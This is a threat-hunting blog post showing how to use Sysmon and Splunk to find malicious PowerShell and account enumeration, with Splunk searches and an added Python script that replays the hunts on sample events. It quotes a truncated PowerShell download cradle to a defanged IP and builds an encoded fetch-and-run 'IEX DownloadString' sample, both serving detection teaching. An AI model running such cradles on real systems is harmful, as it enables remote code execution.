Splunking the Endpoint: Threat Hunting with Sysmon

Michael Haag
Feb 6, 2017 · 5 min read

Sysmon

https://blogs.technet.microsoft.com/motiba/2016/10/18/sysinternals-sysmon-unleashed/

Setup

Sysmon

sysmon.exe -c sysmonconfig-export.xml

Splunk


sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
http://localhost:8000/en-US/manager/app_splunk_sysmon_hunter/admin/macros

Become the Hunter

powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://188[.]164[.]249[.]125/9230dd6471474e2417c19ef02698747e'

Hunting in Splunk

EventDescription

`sysmon` | top EventDescription
`sysmon` process=*\\powershell.exe | stats values(EventDescription) by process
`sysmon` | stats values(EventDescription) by process,CommandLine
`sysmon` | stats values(ParentImage) by process

CommandLine

`sysmon` | stats values(CommandLine) by Computer,process

Processes

`sysmon` process=*\\powershell.exe | stats values(CommandLine) by Computer,process
`sysmon` process=*\\powershell.exe CommandLine="*-enc*" | top CommandLine
`sysmon` process=*\\net.exe | stats count by Computer,CommandLine
`sysmon` process="*\\net.exe" (CommandLine="*net group*" OR CommandLine="*net localgroup*") | stats count by Computer,CommandLine

Users

`sysmon` | stats values(user) by Computer
`sysmon` | stats values(CommandLine) by user
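The Processes and Users searches above only make sense once you can see what fields the Splunk app is pivoting on. The following is an added example, not code from the post or from the Splunk Sysmon app: it parses a handful of constructed Sysmon XmlWinEventLog records and re-implements the same hunts in plain Python so the logic can be checked offline. The field names (process, CommandLine, Computer, user, ParentImage, EventDescription) follow the app's naming; the EventID to EventDescription table is my own assumption modelled on the app's lookup, the sample events and host names are made up, and the base64 payload is generated in the script rather than taken from any real incident.

```python
"""Offline re-implementation of the `sysmon` hunts on this page (added example)."""
import base64
import re
import xml.etree.ElementTree as ET
from collections import Counter, defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Assumed mapping: the Splunk app derives EventDescription from the Sysmon EventID.
EVENT_DESCRIPTION = {1: "Process Create", 3: "Network Connect", 11: "File Create"}


def _event(event_id, computer, data):
    """Build a minimal Sysmon XML record (constructed sample, not real telemetry)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><Provider Name="Microsoft-Windows-Sysmon"/>'
            f'<EventID>{event_id}</EventID><Computer>{computer}</Computer></System>'
            f'<EventData>{fields}</EventData></Event>')


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NET = r"C:\Windows\System32\net.exe"
CMD = r"C:\Windows\System32\cmd.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
# PowerShell -EncodedCommand takes base64 of the UTF-16LE script text.
DECODED = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENC = base64.b64encode(DECODED.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed sample events
    _event(1, "WS01", {"Image": PS, "CommandLine": f"powershell.exe -nop -w hidden -enc {ENC}",
                       "User": r"CORP\alice", "ParentImage": WORD}),
    _event(1, "WS01", {"Image": PS, "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
                       "User": r"CORP\svc_inv", "ParentImage": CMD}),
    _event(3, "WS01", {"Image": PS, "User": r"CORP\alice", "DestinationIp": "192.0.2.10", "DestinationPort": "80"}),
    _event(1, "WS02", {"Image": NET, "CommandLine": 'net group "Domain Admins" /domain',
                       "User": r"CORP\bob", "ParentImage": CMD}),
    _event(1, "WS02", {"Image": NET, "CommandLine": r"net use Z: \\fileserver\share",
                       "User": r"CORP\bob", "ParentImage": CMD}),
]


def parse_event(xml_text):
    """Flatten one Sysmon record into the field names the Splunk searches use."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return {
        "EventID": event_id,
        "EventDescription": EVENT_DESCRIPTION.get(event_id, f"EventID {event_id}"),
        "Computer": root.find("e:System/e:Computer", NS).text,
        "process": data.get("Image", ""),        # app's `process` field is the Image path
        "CommandLine": data.get("CommandLine", ""),
        "user": data.get("User", ""),
        "ParentImage": data.get("ParentImage", ""),
    }


def image_is(event, name):
    """Equivalent of process=*\\<name> : match on the executable basename only."""
    return event["process"].lower().endswith("\\" + name)


def top_event_descriptions(events):
    # `sysmon` | top EventDescription
    return Counter(e["EventDescription"] for e in events)


def commandlines_by_computer_process(events):
    # `sysmon` | stats values(CommandLine) by Computer,process
    out = defaultdict(set)
    for e in events:
        if e["CommandLine"]:
            out[(e["Computer"], e["process"])].add(e["CommandLine"])
    return {k: sorted(v) for k, v in out.items()}


ENC_RE = re.compile(r"-enc\w*\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def hunt_encoded_powershell(events):
    # `sysmon` process=*\\powershell.exe CommandLine="*-enc*" | top CommandLine
    # plus the decode step an analyst does next, and the parent for triage context.
    hits = []
    for e in events:
        if image_is(e, "powershell.exe") and "-enc" in e["CommandLine"].lower():
            m = ENC_RE.search(e["CommandLine"])
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le") if m else None
            hits.append({"Computer": e["Computer"], "user": e["user"], "ParentImage": e["ParentImage"],
                         "CommandLine": e["CommandLine"], "decoded": decoded})
    return hits


def hunt_net_group_enum(events):
    # `sysmon` process="*\\net.exe" (CommandLine="*net group*" OR CommandLine="*net localgroup*")
    # | stats count by Computer,CommandLine
    counts = Counter()
    for e in events:
        cl = e["CommandLine"].lower()
        if image_is(e, "net.exe") and ("net group" in cl or "net localgroup" in cl):
            counts[(e["Computer"], e["CommandLine"])] += 1
    return counts


def users_by_computer(events):
    # `sysmon` | stats values(user) by Computer
    out = defaultdict(set)
    for e in events:
        if e["user"]:
            out[e["Computer"]].add(e["user"])
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    evts = [parse_event(x) for x in SAMPLE_EVENTS]
    print(top_event_descriptions(evts))
    for hit in hunt_encoded_powershell(evts):
        print(hit["Computer"], hit["user"], hit["ParentImage"], "->", hit["decoded"])
    print(hunt_net_group_enum(evts))
    print(users_by_computer(evts))
```

Two caveats worth keeping in mind when you run the real searches: `CommandLine="*-enc*"` matches `-enc` and `-EncodedCommand` but not the single-letter `-e` abbreviation PowerShell also accepts, so widen the filter (or pivot on the parent, as the Word-spawned example above shows) if you want coverage rather than a quick triage list; and `net group` is executed by `net1.exe`, which `net.exe` spawns with the same arguments, so a hunt keyed on `*\\net.exe` alone will show one process per command while a hunt on `*\\net1.exe` will show the other half of the pair.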

Things to do…
